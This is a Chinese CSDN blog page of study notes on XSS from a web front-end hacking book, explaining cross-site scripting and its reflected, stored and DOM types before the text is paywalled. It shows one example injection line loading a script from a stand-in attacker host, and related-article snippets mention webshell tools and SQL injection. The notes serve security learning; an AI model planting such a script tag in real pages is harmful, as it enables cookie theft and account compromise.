《Web前端黑客技术揭秘》学习笔记-XSS

最新推荐文章于 2022-06-20 08:23:19 发布
最新推荐文章于 2022-06-20 08:23:19 发布
阅读量1.6k 收藏
点赞数
分类专栏: Web安全学习 文章标签: web前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u013565525/article/details/22039057
版权
本文是《Web前端黑客技术揭秘》的学习笔记,深入探讨XSS攻击,包括XSS介绍、分类(反射型、存储型、DOM XSS)及一个具体的反射型XSS例子。强调了XSS的危害性及其在现代Web应用中的潜在威胁。
摘要由CSDN通过智能技术生成

       学习和研究Web安全这么久都没有好好地写过心得,SQLi、XSS、CSRF等常见的Web漏洞都看了个遍,回头看来还是什么都不知道(ps:学习和研究的时候做笔记相当重要啊~ ~)。闲暇之余,又拾起余弦大牛的技术精华《Web前端黑客技术揭秘》一书,本人没有做笔记写博客的习惯,但这一次,我要好好地记录一下下,就当练习自己的写作能力了~

0x00 XSS介绍

       XSS(Cross Site Scripting)即跨站脚本,攻击者将恶意代码嵌入html页面里面,当用户浏览该页面的时候就会执行攻击者的恶意代码,导致用户cookie泄漏,用户客户端被攻击等。

       就像书里面讲的一样,跨站脚本的重点并不在 “跨站” 上,而应该在 “脚本” 上。”跨站“ 实际上就是XSS攻击嵌入了一段远程的或者第三方域上的脚本资源,任何安全问题都有 “Input” 的概念,一般有安全意识的网站,输入的内容长度都是有长度限制的,这就给恶意代码直接嵌入页面造成了困难,但是常常会有下面这种攻击情况,引用第三方域上的脚本资源:

<script src="http://www.assailant.com/xss.js"></script>

最低0.47元/天 解锁文章
RickGray
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web前端黑客技术揭秘学习笔记-XSS漏洞挖掘
zhaozhanyong的专栏
05-13 5644
0X00 URL 的一种常见组成模式如下: :///?# 比如,一个最普通的URL 如下: http://www.foo.com/path/f.php?id=1&type=cool#new 对应关系如下: - http - www.foo.com - /path/f.php -id=1&type=cool,包括对 - new 对这个URL 来说,攻击者可控的输
Web前端开发中的黑客技术以及安全技术(共七种)
qkh1234567的博客
05-12 748
想当黑客?是的,基本每个程序员都有一颗相当黑客的心。从【黑客帝国】再到【欧洲攻略】,Hackers总是在黑暗中微笑,慢慢的侵蚀着互联网,侵蚀着他想要去的地方,获取别人的数据库,获取自己想要的信息,是不是帅到不讲武德。但是,我们身为公司的员工,我们有义务和责任保护公司的信息安全,这时候,我们可能有需要和黑客作斗争,化身为正义的天神,与黑暗中那个微笑的男人征战。所以说,这篇文章我想告诉大家前端黑客是如何操作的以及在公司我们如何保护好项目不受侵犯。
web前端黑客技术揭秘学习笔记-Part1
ZhShy
01-14 231
1.1 数据与指令 1.1.1 SQL注入攻击的发生 select username,email,desc from users where id=1; 如果用户访问连接http://www.xxx.com/user.php?id=1来获取自身的账号信息。当访问这样的链接时,后端会执行上面这条SQL语句,并返回对应的id的用户信息到前端页面上。 如果提交1 union select passwor...
Web前端黑客技术揭秘笔记
1CHIG0的博客
03-16 1849
    最近在研究《Web安全权威指南》这本书,然而看到了中间部分时感觉有些吃力,找原因还是基本知识不扎实,因为没有系统的学习过python,php,JS等知识。于是很是苦恼,发现了这本书《Web前端黑客技术揭秘》,其中对基础知识的讲解感觉很全面,以下是一些笔记。1、URL格式&lt;scheme&gt;:?//&lt;netloc&gt;/&lt;path&gt;?&lt;query&gt;#&...
Web前端黑客技术揭秘学习笔记 第二章(二)
無意穿堂的博客
10-25 132
Dom树: &lt;html&gt;是树根,其他是树的每个节点 标签节点以&lt;xxx&gt;表示,属性节点以@xxx表示,而文本节点以xxx表示 隐私数据可能存储在: HTML内容中 浏览器本地存储中,如Cookies等 URL地址中 很多网站通过iframe标签嵌入第三方内容,攻击者入侵网站后可以通过iframe嵌入网马页面 Cookie的重要字段:[name][valu...
web黑客前端技术揭秘 XSS探针:xssprobe 笔记
滕青山博客
02-09 980
前言 xssprobe是evilcos在github开源的一个小工具,通过它可以获取目标页面通用数据。这篇文章是我在在学习源码及实际演练的笔记。 demo.html 含有xss漏洞页面,可以被注入XSS恶意代码来让受害者执行,从而获取受害者的个人信息,如cookie,flash信息,浏览器版本,操作系统版本... 为了方便演示,直接在代码中<script>...</script>引入恶意js代码。 probe.js 就是上面提到的恶意代码,可以获取受害者的隐私信息。 需
web前端黑客技术揭秘 笔记 第一章
王嘟嘟的博客
02-05 319
前言 这里对web前端黑客技术揭秘的知识点做一个笔记,可能更适合个人阅读。这本书里涉及到的东西非常多,全面我不知道,但是需要学习的基础的东西,还有了解的东西很多,遇到不懂的,需要深入挖掘一下的,就继续挖掘。由于本来笔记是写在印象笔记的导致格式可能会有一些问题。 笔记 1.1 数据与指令 1.sql注入 主要就是简单的说了一下sql注入,利用union来进行查询。 一般的情况下,sql发生在服务端,...
Web前端黑客技术揭秘{笔记}
weixin_30279315的博客
12-03 911
前些日子看完了白帽子讲Web安全,当时就PHP安全一章做了点小笔记,感觉看书还是留下点东西比较好。翻开Web前端黑客技术揭秘一书决定要做笔记,但是这样下来其实进度就比较慢了,敲字做笔记绝对远比看书来的慢。有时候上午看完的内容做笔记时要花一天时间,一方面是要敲字,另一方面是自己只从书上摘录部分内容有时候需要将其串起来,还有就是碰上自己想发两句言也会拖慢进度。总之现在书是看完了,要消化的东西有挺多的,...
Web前端黑客技术揭秘 笔记4
wcc526的专栏
10-29 1611
来自http://www.80vul.com/webzine_0x06/PSTZine_0x06_0x02.txt XSS Hack:获取浏览器记住的明文密码 余弦(@evilcos) evilcos@gmail.com [AT]knownsec team [AT]xeye team 0x01. XSS获取明文密码的多种方式 我已经感受到Web潮流带来的巨大革新,尤其是最近HTML5
2022年Web前端开发流程和学习路线
萌兔兔MMQ!!
06-20 999
前端学习
Active Directory(AD)域环境本地测试(外加部分内网渗透命令)
RickGray
07-28 7070
基本概念 活动目录(Active Directory):简单的说,活动目录是实现域环境的一个载体,要想实现一个大型的域环境组织和管理,通过AD可以轻松地实现。AD存储了有关网络对象(objects)的信息,并让管理员和用户都能够很轻松地查找和使用这些信息。AD使用的是一种结构化的数据存储方式,并以此为基础对目录信息进行合乎逻辑的分层组织。 林(Forest):一个或多个域树组成了林,同一林
Weevely(php菜刀)工具使用简介
RickGray
08-02 2729
Weevely工具使用记录 -前言 weevely是一款使用python编写的webshell工具(集webshell生成和连接于一身),可以算作是linux下的一款菜刀替代工具(限于php),在linux上使用时还是很给力的,就是某些模块在windows上无法使用,总的来说还是非常不错的一款工具。 项目地址:https://github.com/epinna/Weevely 下面就针
OSX Mavericks Install The Lastest Metasploit
RickGray
06-19 673
最近购了台mac一直没有时间折腾,下面就把在mac上安装metasploit的步骤做一个简单的记录吧。 安装的几个步骤: 1、从github上克隆Metasploit项目到本地; 2、安装postgresql并进行配置; 3、安装特定版本的ruby,并解决依赖; 0x00 从github上克隆Metasploit项目到本地 话说github真是什么都有,很多好的项目在上面都能找
使用MATLAB实现数值分析课程的算法
08-04
【项目资源】:包含前端、后端、移动开发、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源,毕业设计等各种技术项目的源码。包括C++、Java、python、web、C#、EDA等项目的源码。 【适用人群】:适用于希望学习不同技术领域的初学者或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【附加价值】:项目具有较高的学习借鉴价值,也可直接拿来修改复刻。对于有一定基础或热衷于研究的人来说,可以在这些基础代码上进行修改和扩展,实现其他功能。 【沟通交流】:有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。鼓励下载和使用,并欢迎大家互相学习,共同进步。
基于python+卷积神经网络实现的轴承故障诊断算法+源码+文档(毕业设计&课程设计&项目开发)
08-04
基于python+卷积神经网络实现的轴承故障诊断算法+源码+文档,适合毕业设计、课程设计、项目开发。项目源码已经过严格测试,可以放心参考并在此基础上延申使用,详情见md文档~ 基于python+卷积神经网络实现的轴承故障诊断算法+源码+文档,适合毕业设计、课程设计、项目开发。项目源码已经过严格测试,可以放心参考并在此基础上延申使用,详情见md文档~ 项目简介: main为wdcnn卷积神经网络主文件,运行它就可以得出结果 preprocess为预处理文件,主要实现制作数据集的功能 日志文件保存在logs里面,通过启动tensorboard查看 wdcnn.png为卷积神经网络的结构图像
无声和平地铁公益v9.zip
08-04
无声和平地铁公益v9.zip
树芽读书.rar
08-04
小程序的设计源码通常包含多个文件和文件夹,组织结构清晰,以便开发者能够快速上手并进行定制化开发。主要文件和文件夹包括: 页面文件夹:存放小程序的各个页面,每个页面通常由.wxml、.wxss、.js和.json文件组成。WXML文件负责页面的结构,类似于HTML;WXSS文件负责样式,类似于CSS;JS文件负责页面的逻辑和交互;JSON文件用于页面的配置,如导航栏标题等。 组件文件夹:存放可复用的UI组件。组件与页面类似,也由.wxml、.wxss、.js和.json文件组成。通过组件化设计,可以提高代码的复用性和维护性,减少重复工作。 静态资源文件夹:存放图片、音频、视频等静态资源,便于在小程序中引用。这些资源通常放在一个名为assets或static的文件夹中。 配置文件:小程序的根目录下通常有一个app.json文件,用于全局配置,如页面路径、导航栏样式、底部Tab栏等。此外,还有app.wxss和app.js文件,分别用于全局样式和全局逻辑。 工具文件夹:存放一些工具函数和库文件,便于在小程序中调用。这些文件通常放在一个名为utils的文件夹中。
WPF 圆形进度条的设计与实现
最新发布
08-04
WPF 圆形进度条的设计与实现
Web前端黑客技术揭秘》- 钟晨鸣,徐少培
"Web前端黑客技术揭秘" ...总结来说,《Web前端黑客技术揭秘》全面地探讨了Web前端安全的各个方面,从基础概念到高级攻防策略,提供了一个深入的学习平台,帮助读者增强对Web安全的理解,提升防范意识。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值